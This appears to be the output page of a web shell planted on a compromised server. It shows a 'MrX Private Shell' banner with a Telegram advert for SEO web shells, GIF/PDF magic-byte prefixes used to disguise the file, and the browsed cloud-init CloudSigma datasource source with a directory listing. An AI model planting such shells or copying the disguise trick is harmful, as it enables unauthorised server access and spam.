GIF89; GIF89; %PDF- %PDF-
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# Copyright (C) 2014 CloudSigma
#
# Author: Kiril Vladimiroff <kiril.vladimiroff@cloudsigma.com>
#
# This file is part of cloud-init. See LICENSE file for license information.
import logging
import re
from base64 import b64decode
from cloudinit import dmi, sources
from cloudinit.sources import DataSourceHostname
from cloudinit.sources.helpers.cloudsigma import SERIAL_PORT, Cepko
LOG = logging.getLogger(__name__)
class DataSourceCloudSigma(sources.DataSource):
"""
Uses cepko in order to gather the server context from the VM.
For more information about CloudSigma's Server Context:
http://cloudsigma-docs.readthedocs.org/en/latest/server_context.html
"""
dsname = "CloudSigma"
def __init__(self, sys_cfg, distro, paths):
self.cepko = Cepko()
self.ssh_public_key = ""
sources.DataSource.__init__(self, sys_cfg, distro, paths)
@staticmethod
def ds_detect():
"""
Uses dmi data to detect if this instance of cloud-init is running
in the CloudSigma's infrastructure.
"""
LOG.debug("determining hypervisor product name via dmi data")
sys_product_name = dmi.read_dmi_data("system-product-name")
if not sys_product_name:
LOG.debug("system-product-name not available in dmi data")
return False
LOG.debug("detected hypervisor as %s", sys_product_name)
return "cloudsigma" in sys_product_name.lower()
def _get_data(self):
"""
Metadata is the whole server context and /meta/cloud-config is used
as userdata.
"""
dsmode = None
try:
server_context = self.cepko.all().result
server_meta = server_context["meta"]
except Exception:
# TODO: check for explicit "config on", and then warn
# but since no explicit config is available now, just debug.
LOG.debug("CloudSigma: Unable to read from serial port")
return False
self.dsmode = self._determine_dsmode(
[server_meta.get("cloudinit-dsmode")]
)
if dsmode == sources.DSMODE_DISABLED:
return False
base64_fields = server_meta.get("base64_fields", "").split(",")
self.userdata_raw = server_meta.get("cloudinit-user-data", "")
if "cloudinit-user-data" in base64_fields:
self.userdata_raw = b64decode(self.userdata_raw)
if "cloudinit" in server_context.get("vendor_data", {}):
self.vendordata_raw = server_context["vendor_data"]["cloudinit"]
self.metadata = server_context
self.ssh_public_key = server_meta["ssh_public_key"]
return True
def _get_subplatform(self):
"""Return the subplatform metadata source details."""
return "cepko (%s)" % SERIAL_PORT
def get_hostname(self, fqdn=False, resolve_ip=False, metadata_only=False):
"""
Cleans up and uses the server's name if the latter is set. Otherwise
the first part from uuid is being used.
"""
if re.match(r"^[A-Za-z0-9 -_\.]+$", self.metadata["name"]):
ret = self.metadata["name"][:61]
else:
ret = self.metadata["uuid"].split("-")[0]
return DataSourceHostname(ret, False)
def get_public_ssh_keys(self):
return [self.ssh_public_key]
def get_instance_id(self):
return self.metadata["uuid"]
# Legacy: Must be present in case we load an old pkl object
DataSourceCloudSigmaNet = DataSourceCloudSigma
# Used to match classes to dependencies. Since this datasource uses the serial
# port network is not really required, so it's okay to load without it, too.
datasources = [
(DataSourceCloudSigma, (sources.DEP_FILESYSTEM,)),
]
def get_datasource_list(depends):
"""
Return a list of data sources that match this set of dependencies
"""
return sources.list_from_depends(depends, datasources)
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| __pycache__ | Folder | 0755 |
|
|
| azure | Folder | 0755 |
|
|
| helpers | Folder | 0755 |
|
|
| DataSourceAkamai.py | File | 12.66 KB | 0644 |
|
| DataSourceAliYun.py | File | 15.23 KB | 0644 |
|
| DataSourceAltCloud.py | File | 8.42 KB | 0644 |
|
| DataSourceAzure.py | File | 77.4 KB | 0644 |
|
| DataSourceBigstep.py | File | 1.9 KB | 0644 |
|
| DataSourceCloudCIX.py | File | 5.19 KB | 0644 |
|
| DataSourceCloudSigma.py | File | 3.86 KB | 0644 |
|
| DataSourceCloudStack.py | File | 12.87 KB | 0644 |
|
| DataSourceConfigDrive.py | File | 11.23 KB | 0644 |
|
| DataSourceDigitalOcean.py | File | 4.2 KB | 0644 |
|
| DataSourceEc2.py | File | 42.67 KB | 0644 |
|
| DataSourceExoscale.py | File | 8.62 KB | 0644 |
|
| DataSourceGCE.py | File | 13.65 KB | 0644 |
|
| DataSourceHetzner.py | File | 5.69 KB | 0644 |
|
| DataSourceIBMCloud.py | File | 14.65 KB | 0644 |
|
| DataSourceLXD.py | File | 17.24 KB | 0644 |
|
| DataSourceMAAS.py | File | 14.85 KB | 0644 |
|
| DataSourceNWCS.py | File | 4.41 KB | 0644 |
|
| DataSourceNoCloud.py | File | 15.65 KB | 0644 |
|
| DataSourceNone.py | File | 1.27 KB | 0644 |
|
| DataSourceOVF.py | File | 12.83 KB | 0644 |
|
| DataSourceOpenNebula.py | File | 15.67 KB | 0644 |
|
| DataSourceOpenStack.py | File | 10.2 KB | 0644 |
|
| DataSourceOracle.py | File | 20.13 KB | 0644 |
|
| DataSourceRbxCloud.py | File | 7.85 KB | 0644 |
|
| DataSourceScaleway.py | File | 14.73 KB | 0644 |
|
| DataSourceSmartOS.py | File | 34.25 KB | 0644 |
|
| DataSourceUpCloud.py | File | 5.2 KB | 0644 |
|
| DataSourceVMware.py | File | 41.78 KB | 0644 |
|
| DataSourceVultr.py | File | 4.51 KB | 0644 |
|
| DataSourceWSL.py | File | 16.93 KB | 0644 |
|
| __init__.py | File | 44.46 KB | 0644 |
|